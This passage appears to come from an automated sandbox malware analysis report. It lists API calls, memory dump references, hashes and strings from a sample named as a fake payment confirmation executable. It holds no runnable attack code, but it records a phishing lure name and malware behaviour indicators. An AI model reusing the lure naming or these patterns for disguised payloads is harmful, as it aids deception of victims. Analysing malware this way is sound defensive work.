                                                            • Associated: 00000000.00000002.3528192299.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528579506.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528579506.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_inward_payment_confirmation_reference_Z1766053541_notifications.jbxd
                                                            Similarity
                                                            • API ID: CreateInstance
                                                            • String ID: C:\Users\user\eftermodnendes\ringeagt\Afviklingsforlbet
                                                            • API String ID: 542301482-3948318427
                                                            • Opcode ID: 5b0014f3340ed2e8e047bae132ec64f51d2c526b3404a8b2a52325da7d94e0b0
                                                            • Instruction ID: 6031f0b9305bb7b05064ab4f17c9904609ff1c452577966f293784d012f03e0b
                                                            • Opcode Fuzzy Hash: 5b0014f3340ed2e8e047bae132ec64f51d2c526b3404a8b2a52325da7d94e0b0
                                                            • Instruction Fuzzy Hash: 4A410475A00209AFCB40DFE4C989EAD7BB5BF48308B20457EF505EB2D1DB799982CB54
                                                            APIs
                                                            • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040291F
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3528119336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.3528085443.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528162333.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528579506.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528579506.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_inward_payment_confirmation_reference_Z1766053541_notifications.jbxd
                                                            Similarity
                                                            • API ID: FileFindFirst
                                                            • String ID:
                                                            • API String ID: 1974802433-0
                                                            • Opcode ID: 209a06d9c3b4454fc5c1ff69253149a6aac46e41fe78177cd59690df36c1804c
                                                            • Instruction ID: f0d7266373870d470beff65cac24d35b4a218527411e0b80208e5fb1e93adf0c
                                                            • Opcode Fuzzy Hash: 209a06d9c3b4454fc5c1ff69253149a6aac46e41fe78177cd59690df36c1804c
                                                            • Instruction Fuzzy Hash: 28F08271A04104AED701EBE4ED499AEB378EF14314F60057BE111F31E0D7B84E059B19
                                                            APIs
                                                            • GetDlgItem.USER32(?,000003F9), ref: 00405086
                                                            • GetDlgItem.USER32(?,00000408), ref: 00405091
                                                            • GlobalAlloc.KERNEL32(00000040,?), ref: 004050DB
                                                            • LoadImageW.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 004050F2
                                                            • SetWindowLongW.USER32(?,000000FC,0040567B), ref: 0040510B
                                                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 0040511F
                                                            • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00405131
                                                            • SendMessageW.USER32(?,00001109,00000002), ref: 00405147
                                                            • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00405153
                                                            • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00405165
                                                            • DeleteObject.GDI32(00000000), ref: 00405168
                                                            • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00405193
                                                            • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 0040519F
                                                            • SendMessageW.USER32(?,00001132,00000000,?), ref: 0040523A
                                                            • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 0040526A
                                                              • Part of subcall function 00404636: SendMessageW.USER32(00000028,?,?,00404461), ref: 00404644
                                                            • SendMessageW.USER32(?,00001132,00000000,?), ref: 0040527E
                                                            • GetWindowLongW.USER32(?,000000F0), ref: 004052AC
                                                            • SetWindowLongW.USER32(?,000000F0,00000000), ref: 004052BA
                                                            • ShowWindow.USER32(?,00000005), ref: 004052CA
                                                            • SendMessageW.USER32(?,00000419,00000000,?), ref: 004053C5
                                                            • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 0040542A
                                                            • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 0040543F
                                                            • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00405463
                                                            • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00405483
                                                            • ImageList_Destroy.COMCTL32(?), ref: 00405498
                                                            • GlobalFree.KERNEL32(?), ref: 004054A8
                                                            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405521
                                                            • SendMessageW.USER32(?,00001102,?,?), ref: 004055CA
                                                            • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 004055D9
                                                            • InvalidateRect.USER32(?,00000000,?), ref: 00405604
                                                            • ShowWindow.USER32(?,00000000), ref: 00405652
                                                            • GetDlgItem.USER32(?,000003FE), ref: 0040565D
                                                            • ShowWindow.USER32(00000000), ref: 00405664
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3528119336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.3528085443.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528162333.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528579506.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528579506.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_inward_payment_confirmation_reference_Z1766053541_notifications.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                            • String ID: $M$N
                                                            • API String ID: 2564846305-813528018
                                                            • Opcode ID: 324c1f4819b082b1ac23898fd696f3744d7b458a05ce4ad4b76fe224fda76cd4
                                                            • Instruction ID: 3eec0fee992af157883e3c32035e614d90e83c27d9cb298499668aae57dc4bf7
                                                            • Opcode Fuzzy Hash: 324c1f4819b082b1ac23898fd696f3744d7b458a05ce4ad4b76fe224fda76cd4
                                                            • Instruction Fuzzy Hash: B4029D70A00608EFDB20DF64CD45AAF7BB5FB44314F10857AE910BA2E0D7B98A42DF18
                                                            APIs
                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 0040413E
                                                            • ShowWindow.USER32(?), ref: 0040415E
                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00404170
                                                            • ShowWindow.USER32(?,00000004), ref: 00404189
                                                            • DestroyWindow.USER32 ref: 0040419D
                                                            • SetWindowLongW.USER32(?,00000000,00000000), ref: 004041B6
                                                            • GetDlgItem.USER32(?,?), ref: 004041D5
                                                            • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 004041E9
                                                            • IsWindowEnabled.USER32(00000000), ref: 004041F0
                                                            • GetDlgItem.USER32(?,?), ref: 0040429B
                                                            • GetDlgItem.USER32(?,00000002), ref: 004042A5
                                                            • SetClassLongW.USER32(?,000000F2,?), ref: 004042BF
                                                            • SendMessageW.USER32(0000040F,00000000,?,?), ref: 00404310
                                                            • GetDlgItem.USER32(?,00000003), ref: 004043B6
                                                            • ShowWindow.USER32(00000000,?), ref: 004043D7
                                                            • EnableWindow.USER32(?,?), ref: 004043E9
                                                            • EnableWindow.USER32(?,?), ref: 00404404
                                                            • GetSystemMenu.USER32(?,00000000,0000F060,?), ref: 0040441A
                                                            • EnableMenuItem.USER32(00000000), ref: 00404421
                                                            • SendMessageW.USER32(?,000000F4,00000000,?), ref: 00404439
                                                            • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040444C
                                                            • lstrlenW.KERNEL32(00422F48,?,00422F48,00000000), ref: 00404476
                                                            • SetWindowTextW.USER32(?,00422F48), ref: 0040448A
                                                            • ShowWindow.USER32(?,0000000A), ref: 004045BE
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3528119336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.3528085443.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528162333.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528579506.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528579506.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_inward_payment_confirmation_reference_Z1766053541_notifications.jbxd
                                                            Similarity
                                                            • API ID: Window$Item$MessageSendShow$EnableLong$Menu$ClassDestroyEnabledSystemTextlstrlen
                                                            • String ID: H/B
                                                            • API String ID: 1860320154-184950203
                                                            • Opcode ID: 6713c34f0db6ca24ad0fd02f4a6c26255f157c0ea2add66a7142b4456e47287b
                                                            • Instruction ID: f8b0abefa6079376cca3afd4ac47b8e6787ccd0873a3a79b8952b84eeba681b3
                                                            • Opcode Fuzzy Hash: 6713c34f0db6ca24ad0fd02f4a6c26255f157c0ea2add66a7142b4456e47287b
                                                            • Instruction Fuzzy Hash: 91C1CFB1600204BBDB316F61EE85A2B7AB8EB85345F41053EF741B25F0CB795842DB2D
                                                            APIs
                                                            • CheckDlgButton.USER32(?,-0000040A,?), ref: 0040485E
                                                            • GetDlgItem.USER32(?,000003E8), ref: 00404872
                                                            • SendMessageW.USER32(00000000,0000045B,?,00000000), ref: 0040488F
                                                            • GetSysColor.USER32(?), ref: 004048A0
                                                            • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004048AE
                                                            • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004048BC
                                                            • lstrlenW.KERNEL32(?), ref: 004048C1
                                                            • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004048CE
                                                            • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004048E3
                                                            • GetDlgItem.USER32(?,0000040A), ref: 0040493C
                                                            • SendMessageW.USER32(00000000), ref: 00404943
                                                            • GetDlgItem.USER32(?,000003E8), ref: 0040496E
                                                            • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004049B1
                                                            • LoadCursorW.USER32(00000000,00007F02), ref: 004049BF
                                                            • SetCursor.USER32(00000000), ref: 004049C2
                                                            • LoadCursorW.USER32(00000000,00007F00), ref: 004049DB
                                                            • SetCursor.USER32(00000000), ref: 004049DE
                                                            • SendMessageW.USER32(00000111,?,00000000), ref: 00404A0D
                                                            • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404A1F
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3528119336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.3528085443.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528162333.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528579506.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528579506.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_inward_payment_confirmation_reference_Z1766053541_notifications.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                            • String ID: 7G@$Call$N
                                                            • API String ID: 3103080414-3155595626
                                                            • Opcode ID: b6dc2905c6216746abb3c0cd17d9c39e8b2e61a9098f8b336cb1d1698ee7a258
                                                            • Instruction ID: cd0ff63a31a53d86839c1a5ce07a34679cc09665db384d3569e6db54912acae5
                                                            • Opcode Fuzzy Hash: b6dc2905c6216746abb3c0cd17d9c39e8b2e61a9098f8b336cb1d1698ee7a258
                                                            • Instruction Fuzzy Hash: 9061B0B1A40209BFDB10AF64CD85EAA7B69FB84305F00843AF605B72D0D779AD51CF98
                                                            APIs
                                                            • CloseHandle.KERNEL32(00000000,?,00000000,?,?,00000000,?,?,00406463,?,?), ref: 00406303
                                                            • GetShortPathNameW.KERNEL32(?,004265E8,00000400), ref: 0040630C
                                                              • Part of subcall function 004060D7: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004063BC,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060E7
                                                              • Part of subcall function 004060D7: lstrlenA.KERNEL32(00000000,?,00000000,004063BC,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406119
                                                            • GetShortPathNameW.KERNEL32(?,00426DE8,00000400), ref: 00406329
                                                            • wsprintfA.USER32 ref: 00406347
                                                            • GetFileSize.KERNEL32(00000000,00000000,00426DE8,C0000000,00000004,00426DE8,?,?,?,?,?), ref: 00406382
                                                            • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00406391
                                                            • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004063C9
                                                            • SetFilePointer.KERNEL32(0040A5B0,00000000,00000000,00000000,00000000,004261E8,00000000,-0000000A,0040A5B0,00000000,[Rename],00000000,00000000,00000000), ref: 0040641F
                                                            • GlobalFree.KERNEL32(00000000), ref: 00406430
                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00406437
                                                              • Part of subcall function 00406172: GetFileAttributesW.KERNELBASE(00000003,00403118,C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe,80000000,00000003), ref: 00406176
                                                              • Part of subcall function 00406172: CreateFileW.KERNELBASE(?,?,?,00000000,?,00000001,00000000), ref: 00406198
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3528119336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.3528085443.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528162333.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528579506.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528579506.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_inward_payment_confirmation_reference_Z1766053541_notifications.jbxd
                                                            Similarity
                                                            • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                            • String ID: %ls=%ls$[Rename]$eB$mB$mB
                                                            • API String ID: 2171350718-2529913679
                                                            • Opcode ID: db523023045b127196975f0173c88122861a3a00dd6e7a8812d5311d7169504c
                                                            • Instruction ID: 393dc7f902851ea198dcc63c4c4a9d42cf85fc1b4335f85fcc59b0ede2066cac
                                                            • Opcode Fuzzy Hash: db523023045b127196975f0173c88122861a3a00dd6e7a8812d5311d7169504c
                                                            • Instruction Fuzzy Hash: 35313571600325BBD2206B29AD49F6B3A6CDF41744F17003AF902F62D3DA7CD82686BC
                                                            APIs
                                                            • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                            • BeginPaint.USER32(?,?), ref: 00401047
                                                            • GetClientRect.USER32(?,?), ref: 0040105B
                                                            • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                            • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                            • DeleteObject.GDI32(?), ref: 004010ED
                                                            • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                            • SetBkMode.GDI32(00000000,?), ref: 00401126
                                                            • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                            • SelectObject.GDI32(00000000,?), ref: 00401140
                                                            • DrawTextW.USER32(00000000,00428A60,000000FF,00000010,00000820), ref: 00401156
                                                            • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                            • DeleteObject.GDI32(?), ref: 00401165
                                                            • EndPaint.USER32(?,?), ref: 0040116E
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3528119336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.3528085443.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528162333.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528579506.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528579506.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_inward_payment_confirmation_reference_Z1766053541_notifications.jbxd
                                                            Similarity
                                                            • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                            • String ID: F
                                                            • API String ID: 941294808-1304234792
                                                            • Opcode ID: 9a1d1952d02a6587733a796de720c08d05f060e36ce2c67ddab1b612aed24319
                                                            • Instruction ID: 3c33d73dbc2ffdf14e434cca4ae815e9cfbd561affca8d3971a90777bf4c3be5
                                                            • Opcode Fuzzy Hash: 9a1d1952d02a6587733a796de720c08d05f060e36ce2c67ddab1b612aed24319
                                                            • Instruction Fuzzy Hash: 34418B71800249AFCF058FA5DE459AFBBB9FF45314F00802EF592AA1A0CB34DA55DFA4
                                                            APIs
                                                            • CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe",75923420,C:\Users\user\AppData\Local\Temp\,00000000,00403620,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040392F,?,00000008,0000000A,0000000C), ref: 00406993
                                                            • CharNextW.USER32(?,?,?,00000000,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 004069A2
                                                            • CharNextW.USER32(?,"C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe",75923420,C:\Users\user\AppData\Local\Temp\,00000000,00403620,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040392F,?,00000008,0000000A,0000000C), ref: 004069A7
                                                            • CharPrevW.USER32(?,?,75923420,C:\Users\user\AppData\Local\Temp\,00000000,00403620,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040392F,?,00000008,0000000A,0000000C), ref: 004069BA
                                                            Strings
                                                            • *?|<>/":, xrefs: 00406982
                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 00406931
                                                            • "C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe", xrefs: 00406974
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3528119336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.3528085443.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528162333.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528579506.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528579506.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_inward_payment_confirmation_reference_Z1766053541_notifications.jbxd
                                                            Similarity
                                                            • API ID: Char$Next$Prev
                                                            • String ID: "C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                            • API String ID: 589700163-4151069947
                                                            • Opcode ID: 7c4491ab095b24fecdd0000f8ec6f0e383ca7ce11269c465865605e120ff5cd6
                                                            • Instruction ID: f71de53da442769783aaa0cb2fea73a85be5ebad64e4744dd58b15c84f46a956
                                                            • Opcode Fuzzy Hash: 7c4491ab095b24fecdd0000f8ec6f0e383ca7ce11269c465865605e120ff5cd6
                                                            • Instruction Fuzzy Hash: 2211C8A580021295DB303B548D40B7766F8AF59790F56403FED96B3AC1E77C4C9282BD
                                                            APIs
                                                            • GetWindowLongW.USER32(?,000000EB), ref: 00404685
                                                            • GetSysColor.USER32(00000000), ref: 004046C3
                                                            • SetTextColor.GDI32(?,00000000), ref: 004046CF
                                                            • SetBkMode.GDI32(?,?), ref: 004046DB
                                                            • GetSysColor.USER32(?), ref: 004046EE
                                                            • SetBkColor.GDI32(?,?), ref: 004046FE
                                                            • DeleteObject.GDI32(?), ref: 00404718
                                                            • CreateBrushIndirect.GDI32(?), ref: 00404722
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3528119336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.3528085443.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528162333.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528579506.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528579506.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_inward_payment_confirmation_reference_Z1766053541_notifications.jbxd
                                                            Similarity
                                                            • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                            • String ID:
                                                            • API String ID: 2320649405-0
                                                            • Opcode ID: 9dba601b91aff6ac4bf2e5f3eaee39d76022ea5146a5c84035e03d3d84c8d27c
                                                            • Instruction ID: a82f55cf926b6e885627a74f3bab1bdd796941bf972b84b6a5e459a8b365bc4c
                                                            • Opcode Fuzzy Hash: 9dba601b91aff6ac4bf2e5f3eaee39d76022ea5146a5c84035e03d3d84c8d27c
                                                            • Instruction Fuzzy Hash: 5C2177715007449BC7309F78DD48B577BF4AF42715B04893DEA96A36E0D738E944CB58
                                                            APIs
                                                            • lstrlenW.KERNEL32(00421F28,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030AD,00000000,?), ref: 0040573F
                                                            • lstrlenW.KERNEL32(004030AD,00421F28,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030AD,00000000), ref: 0040574F
                                                            • lstrcatW.KERNEL32(00421F28,004030AD,004030AD,00421F28,00000000,00000000,00000000), ref: 00405762
                                                            • SetWindowTextW.USER32(00421F28,00421F28), ref: 00405774
                                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040579A
                                                            • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004057B4
                                                            • SendMessageW.USER32(?,00001013,?,00000000), ref: 004057C2
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3528119336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.3528085443.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528162333.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528579506.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528579506.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_inward_payment_confirmation_reference_Z1766053541_notifications.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                            • String ID:
                                                            • API String ID: 2531174081-0
                                                            • Opcode ID: 478899543bd82950d8a4d30903f75c7e93d106f960787587e0f6081d0d83e678
                                                            • Instruction ID: 0122bdc4cc194b68d617bf21deccaf32741d68d09ea49b6ef8aede989cb0ca1f
